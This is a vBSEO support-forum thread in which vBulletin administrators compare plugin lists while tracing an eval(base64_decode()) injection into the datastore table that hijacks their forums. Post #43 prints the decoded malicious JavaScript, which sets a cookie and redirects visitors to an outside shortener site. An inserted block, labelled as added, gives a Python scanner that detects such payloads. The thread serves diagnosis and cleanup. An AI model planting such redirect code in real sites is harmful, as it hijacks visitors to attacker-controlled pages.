
Security issue

This is a discussion on Security issue within the Bug Reporting forums, part of the vBSEO SEO Plugin category.

  1. #31
    Junior Member
    Real Name
    Dominik
    Join Date
    Apr 2008
    Posts
    3
    Liked
    0 times
    Ok, here are mine:

    vBulletin 3.8.4
    • AME - The Automatic Media Embeder 2.5.6
    • Geek Auto-Linker 6.0.8
    • vBSEO 3.5.0 RC2
    • vBSEO :: Sitemap Generator 2.2

  2. #32
    vBSEO Staff
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    Off topic, but you should really upgrade to sitemap 2.5.
    Brian Cummiskey / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  3. #33
    Senior Member
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    We had the same problem as well and reported some time ago.


    Out of those plugins installed above, we had AME and VBSEO and Sitemaps installed.

    We have another forum that has VBSEO and Sitemaps but no AME and it has NOT been hit.

  4. #34
    Senior Member
    Real Name
    Michael Biddle
    Join Date
    Jan 2007
    Location
    Southern California
    Posts
    7,095
    Liked
    5 times
    No AME here. vBSEO and vBSEO Sitemap Generator as a match though.
    The Forum Hosting - Forum Hosting from the Forum Experts

  5. #35
    Member
    Real Name
    Chris watson
    Join Date
    Oct 2006
    Posts
    38
    Liked
    0 times
    List of our mods-

    AMP Auto Tagger 1.0.1
    Hasann - Sub-Forum Manager 4.0.0
    ibProArcade for vBulletin 2.7.0
    Member Tracking 4.0.1
    Multiple Login Detector 1.03
    Post Replacements 1.8
    Post Thank You Hack 7.82
    Prevent Spam 1.0
    Separate Sticky and Normal Threads 4.0.1
    Spiders in WGO 1.0
    Thread Thumbnails 2.0.0
    Usergroup Color Bar 2.0.0
    vBSEO 3.5.0 RC2
    vBSEO :: Sitemap Generator 2.5
    vBulletin Blog 4.0.2
    vBulletin CMS 4.0.2
    VSa - Login To User Account 3.0.2

    Hope this helps.

  6. #36
    vBSEO Staff
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    ^note, you should install sitemap 2.6 on vb4.
    Brian Cummiskey / Crawlability Inc.


  7. #37
    Senior Member
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    Ok, so we were running Sitemaps Generator 1.7. Oops. Just upgraded that to the latest one today. Will see if that helps, but kind of doubt it because I'm assuming that you are already running that one, Brian?

    On another note, we have 4 web servers running behind a load balancer - each one keeping its own set of Apache logfiles. I erased the logs completely on Saturday and then we got hit again on Sunday so it was relatively easy to scan through all of the logs to see if there was anything interesting. Nothing there. Nada. At least, nothing that caught my eye. This appears to be a SQL injection directly into my datastore table in the vB database that loads the famous eval(base64_decode()); code that redirects to the myfilestore.com site. This time there did not appear to be anything in my vbseo plugin's global_start hook, though it did appear there once in the past as well. I searched for catch phrases like eval, base64, etc. and returned nothing. Any other ideas? I'm still semi-convinced this is happening through vBSEO, somehow.
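
The datastore injection described in post #37, as an added example that is not part of the thread and is not vBSEO or vBulletin code: a static scanner that flags `eval(base64_decode(...))` in exported datastore rows, peels nested layers without executing anything, and lists the redirect URLs it finds. It assumes the rows have been exported as (title, data) pairs; the row titles, serialized content and `redirect.example.invalid` are constructed.

```python
import base64
import binascii
import re

# eval(base64_decode('...')) with optional whitespace and either quote style.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE)
URL = re.compile(r"""https?://[^\s'"<>)]+""")

def decode_payload(b64_text):
    """Decode statically (never execute); None if it is not valid base64."""
    try:
        raw = base64.b64decode("".join(b64_text.split()), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")

def unwrap(text, max_depth=5):
    """Peel nested eval(base64_decode()) layers; return (innermost text, layers)."""
    depth = 0
    while depth < max_depth:
        m = EVAL_B64.search(text)
        decoded = decode_payload(m.group(2)) if m else None
        if decoded is None:
            break
        text, depth = decoded, depth + 1
    return text, depth

def scan_rows(rows):
    """rows: iterable of (title, data) pairs exported from the datastore table."""
    findings = []
    for title, data in rows:
        if EVAL_B64.search(data):
            inner, depth = unwrap(data)
            findings.append({"title": title, "layers": depth,
                             "urls": URL.findall(inner) if depth else []})
    return findings

# Constructed sample: two wrapped layers around a redirect to a placeholder host.
_inner = "echo \"<script>document.location='http://redirect.example.invalid/x'</script>\";"
_l1 = "eval(base64_decode('%s'));" % base64.b64encode(_inner.encode()).decode()
_l2 = 'eval( base64_decode("%s") );' % base64.b64encode(_l1.encode()).decode()
SAMPLE_ROWS = [
    ("options", 'a:1:{s:7:"bbtitle";s:5:"Forum";}'),
    ("pluginlist", 'a:1:{s:12:"global_start";s:%d:"%s";}' % (len(_l2), _l2)),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f)
```

Running the same scan on a snapshot taken before the datastore is rebuilt preserves the evidence that a rebuild would otherwise erase.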

  8. #38
    vBSEO Staff
    Real Name
    Oleg Ignatiuk
    Join Date
    Jun 2005
    Location
    Belarus
    Posts
    25,818
    Liked
    192 times
    Hello,

    did you store a copy of datastore at the moment when the issue was happening? If yes, can you provide it in the support ticket?
    Oleg Ignatiuk / Crawlability Inc.


  9. #39
    Senior Member
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    No, but if/when it happens again I'll make a copy of it. All I end up doing is cycling any product inside of AdminCP which rebuilds the datastore and gets rid of it. Interesting though that the common denominator here appears to be vBSEO and the Sitemap Generator. I'm not pointing fingers by any means, but if it's a common denominator I'd say it warrants some investigation. When I originally submitted a support ticket for this issue about a month ago, I was pretty much brushed off immediately as "this isn't a vBSEO problem". Glad to see that it's starting to get some more attention now that others are reporting it as well!

  10. #40
    vBSEO Staff
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    We are all for trying to find this if it is in fact a hole in our product, but without any log/etc data, it's a wild goose chase and no one has been able to supply such events yet.
    Brian Cummiskey / Crawlability Inc.


  11. #41
    Senior Member
    Real Name
    Martyn Day
    Join Date
    Dec 2005
    Location
    Kent - UK
    Posts
    650
    Liked
    0 times
    Blog Entries
    1
    If it's not a hole in vBSEO it might be a hole in vB itself, so it could affect everyone. I hope you guys find it.

  12. #42
    Senior Member
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    Just a quick update - since patching to the Sitemap Generator version 2.5, we've not seen the exploit come back...yet. Can anyone confirm that this HAS happened to them while using v2.5? Trying to narrow things down as best as I can without being able to find anything suspicious in the log files. I'd love nothing more than to say that this fixed the problem, but for now I'm keeping my fingers crossed.

  13. #43
    Junior Member
    Real Name
    Twelve-60
    Join Date
    Mar 2010
    Posts
    3
    Liked
    0 times
    The javascript code translates into:

    Code:
    var vbsp='96e3ad8c';
    function ipbcc(name, value) {
        var date = new Date();
        date['setTime'](date['getTime']() + 86400000);
        var expires = '; expires=' + date['toGMTString']();
        document['cookie'] = name + '=' + value + expires + '; path=/'
    };
    ipbcc('vbsp', '1');
    document['location'] = 'http://url2short.info/' + vbsp;

    However I still can't find where on the serverside it is being outputted from though >_<

    - Twelve-60

  14. #44
    Junior Member
    Real Name
    Andrew Hunn
    Join Date
    May 2007
    Posts
    3
    Liked
    0 times
    I just patched up a compromised installation by installing Sitemaps 2.5 and resetting the datastore. I'll keep checking it out over the next few days to make sure that it stays closed.

    Our hijack was going to URL123 - free url redirection and masking service. I noticed it was being hosted by DreamHost and sent a report to their abuse inbox. Hopefully this scumbag has a bunch of sites hosted through them that will get shut down.

    Also uploading a dump of our infected datastore for analysis. Hope it's helpful.

  15. #45
    Junior Member
    Real Name
    Twelve-60
    Join Date
    Mar 2010
    Posts
    3
    Liked
    0 times
    After being unsuccessful in finding the source of the outputted JavaScript, I reimported crawlability_vbseo.xml and it seemed to fix it!

    - Twelve-60
